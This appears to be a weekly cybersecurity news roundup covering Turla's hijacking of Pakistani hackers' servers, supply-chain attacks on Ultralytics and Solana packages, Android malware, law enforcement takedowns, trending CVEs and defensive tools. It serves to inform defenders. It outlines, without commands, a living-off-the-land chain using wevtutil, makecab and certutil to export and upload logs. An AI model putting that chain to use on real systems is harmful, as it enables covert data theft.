This week's cyber world is like a big spy movie. Hackers are breaking into other hackers' setups, sneaky malware is hiding in popular software, and AI-powered scams are tricking even the smartest of us. On the other side, the good guys are busting secret online markets and kicking out shady chat rooms, while big companies rush to fix new security holes before attackers can jump in.
Want to know who's hacking who, how they're doing it, and what's being done to fight back? Stick around—this recap has the scoop.
⚡ Threat of the Week
Turla Hackers Hijack Pakistan Hackers' Infrastructure — Imagine one hacker group sneaking into another hacker group's secret hideout and using their stuff to carry out their own missions. That's basically what the Russia-linked Turla group has been doing since December 2022. They broke into the servers of a Pakistani hacking team called Storm-0156 and used those servers to spy on government and military targets in Afghanistan and India. By doing this, Turla not only got easy access to important information but also made it way harder for anyone to figure out who was actually running the show. This is a classic move for Turla—they often hijack other hackers' operations to hide their tracks and make it super confusing to tell who's really behind these attacks.
 
         
        10 Steps to Microsoft 365 Cyber Resilience
75% of organizations get hit by cyberattacks, and most report getting hit more than once. Read this ebook to learn 10 steps to take to build a more proactive approach to securing your organization's Microsoft 365 data from cyberattacks and ensuring cyber resilience.
π Top News
- Ultralytics and @solana/web3.js Libraries Targeted by Supply Chain Attacks — In two separate incidents, unknown threat actors managed to push malicious versions of the popular Ultralytics library for Python and @solana/web3.js package for npm that contained code to drop a cryptocurrency miner and a drainer, respectively. The maintainers have since released updated versions to address the issue.
- New Android Malware DroidBot Targets Over 70 Financial Institutions — Dozens of banking institutions, cryptocurrency exchanges, and national organizations have become the target of a newly discovered Android remote access trojan (RAT) called DroidBot. The malware is capable of gathering a wide range of information from compromised devices. A majority of the campaigns distributing the malware have targeted users in Austria, Belgium, France, Italy, Portugal, Spain, Turkey, and the United Kingdom. DroidBot has been observed operating under a malware-as-a-service (MaaS) model for a monthly fee of $3,000.
- A Busy Week of Law Enforcement Actions — Europol last week announced the disruption of a clearnet marketplace called Manson Market that facilitated online fraud on a large scale by acting as a hub for stolen financial information. A 27-year-old and a 37-year-old have been arrested in Germany and Austria, respectively, in connection with the operation. They are currently in pretrial detention. Separately, the law enforcement agency said it also dismantled an invite-only encrypted messaging service called MATRIX that's created by criminals for criminal purposes, including drug trafficking, arms trafficking, and money laundering.
- Tibetans and Uyghurs Become the Target of Earth Minotaur — A newly christened threat activity cluster dubbed Earth Minotaur has been found leveraging the MOONSHINE exploit kit to deliver a new backdoor called DarkNimbus as part of long-term surveillance operations targeting Tibetans and Uyghurs. In the attack chains documented by Trend Micro, the attackers leveraged WeChat as a conduit to deploy the backdoor. The use of MOONSHINE has been previously linked to other groups like POISON CARP and UNC5221, suggesting some kind of tool sharing.
- Salt Typhoon Guidance Issued — Australia, Canada, New Zealand, and the U.S. issued a joint guidance for organizations to safeguard their networks against threats posed by Salt Typhoon, which has been recently linked to a spate of cyber attacks directed against telecommunication companies in the U.S., including AT&T, T-Mobile, and Verizon. As many as eight telecom companies in the U.S., with dozens of other nations, are estimated to be affected as a result of the campaign.
- Malware Campaign Leverages Corrupt Word and ZIP Files — New phishing campaigns ongoing since at least August 2024 have been taking advantage of corrupted Microsoft Office documents and ZIP archives as a way to bypass email defenses. "By manipulating specific components like the CDFH and EOCD, attackers can create corrupted files that are successfully repaired by applications but remain undetected by security software," ANY.RUN said.
π₯ Trending CVEs
Heads up! Some popular software has serious security flaws, so make sure to update now to stay safe. The list includes — CVE-2024-41713 (Mitel MiCollab), CVE-2024-51378 (CyberPanel), CVE-2023-45727 (Proself), CVE-2024-11680 (ProjectSend), CVE-2024-11667 (Zyxel), CVE-2024-42448 (Veeam), CVE-2024-10905 (SailPoint IdentityIQ), CVE-2024-5921 (Palo Alto Networks GlobalProtect), CVE-2024-29014 (SonicWall), CVE-2014-2120 (Cisco Adaptive Security Appliance), CVE-2024-20397 (Cisco NX-OS), CVE-2024-52338 (Apache Arrow), CVE-2024-52316 (Apache Tomcat), CVE-2024-49803, CVE-2024-49805 (IBM Security Verify Access Appliance), CVE-2024-12053 (Google Chrome), CVE-2024-38193 (Microsoft Windows), and CVE-2024-12209 (WP Umbrella: Update Backup Restore & Monitoring plugin).
π° Around the Cyber World
- Researchers Debut New VaktBLE Framework — A group of academics from the ASSET (Automated Systems SEcuriTy) Research Group at the Singapore University of Technology and Design has unveiled a novel jamming technique called VaktBLE that can be used to defend against low-level Bluetooth Low Energy (BLE) attacks. "VaktBLE presents a novel, efficient, and (almost) deterministic technique to silently hijack the connection between a potentially malicious BLE central and the target peripheral to be protected," the researchers explained. "This creates a benevolent man-in-the-middle (MiTM) bridge that allows us to validate each packet sent by the BLE central."
- FBI Warns of AI-Enabled Financial Fraud — The U.S. Federal Bureau of Investigation (FBI) is warning that cybercriminals are exploiting generative artificial intelligence (AI) to generate synthetic content and commit fraud at scale. This comprises the use of AI tools to produce realistic images, audio, and video clips of people, celebrities, and topical events; generate fraudulent identification documents; create fictitious social media profiles; craft convincing messages; assist with language translation; generate content for counterfeit websites; and even embed chatbots that aim to trick victims into clicking on malicious links. "Criminals use AI-generated text to appear believable to a reader in furtherance of social engineering, spear-phishing, and financial fraud schemes such as romance, investment, and other confidence schemes or to overcome common indicators of fraud schemes," the FBI said.
- Lateral Movement Techniques on macOS — Cybersecurity researchers have highlighted the different ways threat actors are exploiting SSH, Apple Remote Desktop, and Remote Apple Events (RAE) to facilitate lateral movement on Apple macOS systems. "Lateral movement refers to the techniques cyber attackers use to navigate through a network after compromising an initial system," Palo Alto Networks Unit 42 said. "This phase is crucial for attackers to achieve their ultimate objectives, which might include data exfiltration, persistence or further system compromise." The disclosure comes as new research has revealed how the legitimate Windows Event Logs utility wevtutil.exe could be exploited to carry out malicious activities and slip past security controls unnoticed, a technique known as living-off-the-land. "Using wevtutil.exe as part of a chain of LOLBAS utilities can further obfuscate actions," Denwp Research's Tonmoy Jitu said. "For instance, an attacker could export logs using wevtutil.exe, compress the exported file with makecab.exe, [and] use certutil.exe to upload the file to a remote location."
- Another Scattered Spider Hacker Arrested in the U.S. — U.S. authorities have arrested a 19-year-old teenager named Remington Goy Ogletree (aka remi) for his role in the Scattered Spider cybercrime syndicate and breaching a U.S. financial institution and two unnamed telecommunications firms. "From at least October 2023 through at least May 2024, Ogletree perpetuated a scheme to defraud in which he called and sent phishing messages to U.S.- and foreign-based company employees to gain unauthorized access to the companies' computer networks," per a complaint filed in late October 2024. "Once Ogletree had access to the victim companies' networks, Ogletree accessed and stole confidential data, including data that was later posted for sale on the dark web, and, at times, used the companies' services to facilitate the theft of cryptocurrency from unwitting victims. As a result of Ogletree's scheme, victims have suffered over $4 million in losses." The charges come weeks after the U.S. government indicted five other members of the infamous hacking crew. Scattered Spider is believed to be part of a broader loose-knit cybercrime group called The Com. According to a new report published by CyberScoop, The Com and a child sextortion sub-cluster known as 764 are engaging in financially motivated cybercrime tactics such as SIM swapping, IP grabbing, ATM skimming, and social engineering to commit violent crimes.
- FTC Takes Action Against 2 Data Brokers — The U.S. Federal Trade Commission (FTC) has banned Virginia-based Gravy Analytics and its subsidiary Venntel from tracking and selling sensitive location data from users, including selling data about consumers' visits to health-related locations and places of worship, without their consent. It has also been ordered to establish a sensitive data location program. It's alleged that the two companies "obtained consumer location information from other data suppliers and claimed to collect, process, and curate more than 17 billion signals from around a billion mobile devices daily." The data was gathered from ordinary mobile apps, and then sold to other businesses or government agencies. Venntel's data is reportedly used by controversial surveillance company Babel Street to power its product Locate X, which can be used to precisely monitor a user's whereabouts without a warrant. The FTC also accused Mobilewalla, a Georgia-based data broker, of purposefully tracking users by collecting massive amounts of sensitive consumer data, like visits to health clinics and places of worship, from real-time bidding exchanges and third-party aggregators. "Mobilewalla exploited vulnerabilities in digital ad markets to harvest this data at a stunning scale," the FTC said. In a related move, the Consumer Financial Protection Bureau (CFPB) proposed new rules to curb the sale of sensitive personal and financial information, such as Social Security numbers and banking details, to other parties without a legitimate reason. The development also comes as FTC announced an enforcement action against facial recognition firm IntelliVision Technologies for deceptively marketing its software as being accurate and that it "performs with zero gender or racial bias" without providing any evidence to back up its claims.
π₯ Expert Webinar
- Learn How Experts Secure Privileged Accounts — In this expert-led webinar, learn proven techniques for managing privileged access and stopping cyber threats before they escalate. We'll show you how to discover hidden accounts, gain full visibility into user activities, enforce least privilege policies, and create a stronger security posture that protects your organization's critical assets.
- Understanding Blind Spots in Advanced Security Systems — Discover why even well-prepared companies still experience breaches, and learn how to strengthen your defenses in this webinar with Silverfort's CISO, John Paul Cunningham. Explore common vulnerabilities, modern threats, tactics to spot hidden risks, and strategies to align security efforts with business goals. Gain actionable insights to protect your organization.
π§ Cybersecurity Tools
- Vanir Security Patch Validation Tool — Vanir is an open-source tool from Google that helps developers quickly find and fix missing security patches in their Android code. Instead of relying on version numbers or build info, Vanir compares source code to known vulnerabilities, ensuring better accuracy and coverage. By connecting with the Open Source Vulnerabilities database, Vanir always stays up-to-date. With a 97% accuracy rate, it reduces manual work, speeds up patch adoption, and helps ensure that devices receive critical security updates more quickly.
- garak LLM Vulnerability Scanner — garak is a free tool that scans large language models (LLMs) for weaknesses. Think of it like nmap, but for LLMs. It tries to break models by testing them with many different probes, looking for failures like hallucinations, data leaks, misinformation, or prompt injections. Each time it finds a flaw, garak logs the exact prompt, response, and reason, so you know what to fix. With dozens of plugins and thousands of tests, garak adapts over time as the community adds new, tougher challenges.
π Tip of the Week
Turn Your PC into a Malware 'No-Go' Zone — Malware often avoids running if it suspects it's in a research lab or test environment. By placing fake clues—like virtual machine-related registry keys, empty folders named after analysis tools, or dummy drivers—on your PC, you can trick malware into thinking it's being watched. Tools like Malcrow (open-source) and Scarecrow (free) create fake indicators—virtual machine keys, dummy processes, or tool-like entries—to fool it into retreating. This might make certain threats back off before causing harm. Although this trick isn't perfect, it can add a subtle extra layer of security, alongside your antivirus and other defenses. Just remember to test changes carefully and keep things believable. It won't stop every attacker, but it might deter less sophisticated malware from targeting your system.
Conclusion
As you think about this week's threats, consider some less common tactics. For example, plant fake "decoy" files on your network—if someone opens them, you'll know there's a problem. Keep a clear record of every piece of code you use, so if something strange shows up, you can spot it right away. Also, try controlling who can talk to whom on your network, making it harder for attackers to move around. These simple steps can help you stay one step ahead in a world where cyber risks are always changing.






 
 
 
